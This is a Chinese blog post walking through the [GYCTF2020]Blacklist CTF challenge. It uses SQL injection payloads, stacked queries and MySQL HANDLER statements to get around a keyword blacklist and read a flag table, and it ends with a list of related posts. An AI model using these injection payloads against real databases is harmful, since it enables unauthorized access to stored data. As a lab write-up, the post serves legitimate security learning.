ROSE笔记-[GYCTF2020]Blacklist 1-WP

最新推荐文章于 2024-02-05 15:01:15 发布
最新推荐文章于 2024-02-05 15:01:15 发布
阅读量340 收藏 1
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/109678743
版权

SQL注入 HANDLER语句 数据库安全 注入攻击 安全防护
关键词由CSDN通过智能技术生成

[GYCTF2020]Blacklist 1

在这里插入图片描述输入单引号,报错,sql注入.
在这里插入图片描述在这里插入图片描述

1' or 1=1 order by 2#没有报错
1' or 1=1 order by 3#报错

先尝试联合查询

1' or 1=1 union select 1,2

在这里插入图片描述发现过滤了大部分关键字

1' or 1=1;show databases;#查库
1' or 1=1;show tables;#查表
1' or 1=1;desc FlagHere;#查字段

在这里插入图片描述在这里插入图片描述
9

HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER …
READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭

1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#
居上7788
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wordpress-comment-blacklist:WordPress评论垃圾邮件的简单解决方案
02-05
从压缩包 "wordpress-comment-blacklist-master" 中解压,你将得到项目的源代码。通常,这个项目会提供一个名为 `comment-blacklist.txt` 的文件,这是存储黑名单关键词的文本文件。 在使用前,你需要将 `comment-...
udev-joystick-blacklist:修复了Keyboardmousetablet在Linux中被检测为操纵杆的问题
05-16
udev-joystick-blacklist 修复了在Linux中将键盘/鼠标/平板电脑检测为操纵杆的问题。 尽管有一些设备被内核识别为操纵杆,但它们并不是操纵杆。 该存储库包含规则,这些规则将防止将非功能性的/dev/input/js*和/dev/...
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2475
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 单引号 只能使用 堆叠注入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名 1' and (extractvalue(1,c
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2353
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
[GYCTF2020]Blacklist1
whale_waves的博客
11-07 99
其实这一题我看到的第一反应是基于布尔的盲注 原因: 没有禁用ascii substr 之类的, 并且输入1和0时输入1会有回显0不会 这里将预编译注入、联合注入、报错注入、都过滤的干净 通过它给出的黑名单考虑可用的命令 可尝试的 堆叠注入例如show database和show tables handler命令 基于布尔的盲注(通过1^0^1,真假真为假,1^1^1,真真真为真,来做手段) !!这里后面会排除掉,应为后面才想起来select被禁了,但是查询需要用
[GYCTF2020]Blacklist1-BUUCTF-详解
chinese_cabbage0的博客
02-05 1749
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
express-jwt-blacklist:用于令牌黑名单的express-jwt插件
05-16
var blacklist = require ( 'express-jwt-blacklist' ) ; var app = express ( ) ; app . use ( jwt ( { secret : 'my-secret' , isRevoked : blacklist . isRevoked } ) ) ; app . get ( '/logout' , function ( ...
wp-plugin-blacklist:用于将其他插件列入黑名单的 WordPress 必备插件
06-21
WP插件黑名单 用于将其他插件列入黑名单的 WordPress 必备插件 警告:必须作为 Must-Use 插件安装,作为普通插件安装时将不起作用。 只会停止安装或激活新插件。 对以前安装的插件没有影响。 入门 下载并解压或克隆...
前端开源库-lws-blacklist
08-30
要使用`lws-blacklist`,首先需要将`blacklist-master`解压并集成到您的LWS项目中。这通常涉及到以下步骤: - 安装依赖:确保系统已经安装了libwebsockets库和必要的构建工具。 - 配置项目:在`CMakeLists.txt`或...
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 654
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 361
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
[GYCTF2020]Blacklist堆叠注入
qq_43801002的博客
04-27 3326
[GYCTF2020]Blacklist 1';show columns from `FlagHere`; %23 查看列 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭...
/etc/modprobe.d/blacklist-nouveau.conf
最新发布
04-14
`/etc/modprobe.d/blacklist-nouveau.conf`是一个配置文件,用于禁用Linux系统中的nouveau显卡驱动程序。nouveau是一个开源的NVIDIA显卡驱动程序,但在某些情况下可能会导致系统出现问题。通过在`/etc/modprobe.d/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值